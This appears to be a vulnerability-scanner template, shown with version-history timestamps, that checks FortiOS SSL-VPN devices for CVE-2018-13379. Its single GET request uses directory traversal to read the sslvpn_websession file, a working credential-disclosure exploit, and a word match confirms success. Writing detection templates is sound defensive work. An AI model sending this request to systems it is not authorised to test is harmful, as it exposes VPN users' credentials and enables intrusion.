2020-04-22 06:42:01 +00:00
|
|
|
id: CVE-2018-13379
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
|
|
|
|
author: organiccrap
|
|
|
|
severity: high
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
2020-05-25 07:49:06 +00:00
|
|
|
path:
|
2020-04-22 06:42:01 +00:00
|
|
|
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2020-05-25 07:49:06 +00:00
|
|
|
words:
|
2020-04-22 06:42:01 +00:00
|
|
|
- "var fgt_lang ="
|